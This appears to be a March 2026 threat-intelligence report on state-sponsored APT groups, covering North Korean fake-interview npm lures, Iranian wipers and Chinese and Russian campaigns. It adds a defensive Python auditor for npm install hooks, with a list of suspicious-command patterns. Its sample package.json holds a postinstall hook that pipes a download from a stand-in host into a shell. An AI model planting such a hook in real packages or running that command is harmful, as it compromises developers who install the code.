March 2026 Threat Trend Report on APT Groups
Purpose and Scope.
This report analyzes the strategies, techniques, and impact of APT groups believed to be state-sponsored.
It excludes financially motivated crime groups from its scope and organizes the major threat behaviors by the representative group names used in ATIP.
The activities of 13 APT groups were aggregated from publicly available data for the most recent month.
Leading APT groups by region.
- North Korea-affiliated: Famous Chollima deploys modular Node.js/Python/Go malware on developer endpoints through fake job interviews and malicious VS Code and npm repositories to steal credentials, source code, and cryptocurrency wallet keys.
- Iran-affiliated: Handala combines information gathering with system disruption, using the BiBi/Hatef wiper to paralyze healthcare, education, and infrastructure targets and public messaging to extend its political influence.
- MuddyWater and others compromised U.S., Israeli, and Canadian organizations using the Deno-based Dindoor and Python-based Fakeset tools, delivering payloads and attempting data exfiltration through legitimate cloud storage services.
- China-affiliated: Silver Dragon/UAT-9244 and others conduct long-term, low-profile information collection using kernel- and driver-level concealment and C2 over trusted services such as Google Drive and BitTorrent.
- Russia-affiliated: APT28/Sandworm exploits vulnerabilities in Roundcube, RDP, and edge devices and deploys wiper and OT-targeting modules against national critical infrastructure, running espionage and sabotage in parallel in the traditional pattern.
- South Asia/Pakistan-affiliated: SloppyLemming/Transparent Tribe abuse trust-based execution chains such as ClickOnce, LNK, and ISO files and produce multiple variants using AI-assisted development and non-mainstream programming languages.
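The Famous Chollima entry above describes malware reaching developer endpoints through repositories handed out as interview tasks. A practical check before running `npm install` on such a repository is to inspect the install-time lifecycle scripts in package.json, since npm executes them automatically. The script below is an added example written for this report, not tooling from the report or from any vendor named in it; the indicator patterns and the sample package.json are constructed assumptions, not artifacts from a real campaign.

```python
import json
import re

# Lifecycle hooks that npm runs automatically during `npm install`
# (hook names as documented by npm). Code here executes without the
# developer ever importing the package.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# Constructed heuristic indicators (assumption: tune to your environment).
# They are generic red flags, not a signature for any specific malware family.
SUSPICIOUS = [
    (r"\b(curl|wget)\b", "downloads remote content"),
    (r"node\s+-e\b", "inline node evaluation"),
    (r"\bbase64\b|atob\(|Buffer\.from\([^)]*base64", "base64 decoding"),
    (r"\beval\(", "eval"),
    (r"child_process|execSync|spawn\(", "spawns a process"),
    (r"https?://", "hard-coded URL"),
]


def audit_package_json(text):
    """Return a list of (hook, reason, command) findings for one package.json.

    Every install-time hook is reported, because its mere presence in a
    repository handed to you by a stranger deserves a manual look; matched
    indicators are joined into the reason string.
    """
    pkg = json.loads(text)
    scripts = pkg.get("scripts") or {}
    findings = []
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        matched = [reason for pattern, reason in SUSPICIOUS if re.search(pattern, cmd)]
        findings.append((hook, ", ".join(matched) or "install hook present", cmd))
    return findings


# Constructed sample: a package.json from a hypothetical "interview task" repo.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "interview-task",
    "version": "1.0.0",
    "scripts": {
        "test": "jest",
        "postinstall": "node -e \"require('child_process').execSync("
                       "'curl -s https://example.invalid/x | sh')\"",
    },
})

if __name__ == "__main__":
    for hook, reason, cmd in audit_package_json(SAMPLE_PACKAGE_JSON):
        print(f"[{hook}] {reason}: {cmd}")
```

Run it against the package.json of any repository received through a recruiting contact before installing; a legitimate `prepare` hook such as a git-hook installer will still be listed, which is intended, since the goal is to force a human look at anything that runs at install time. Pair it with `npm install --ignore-scripts` for the initial install.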
Conclusion.
State-sponsored APT groups are combining social engineering with legitimate tools and cloud services to improve stealth and persistence, and they achieve high success rates with lures tailored to each target.
Target organizations need visibility into developer environments, cloud usage, email, and remote access paths, backed by a threat intelligence-driven response process.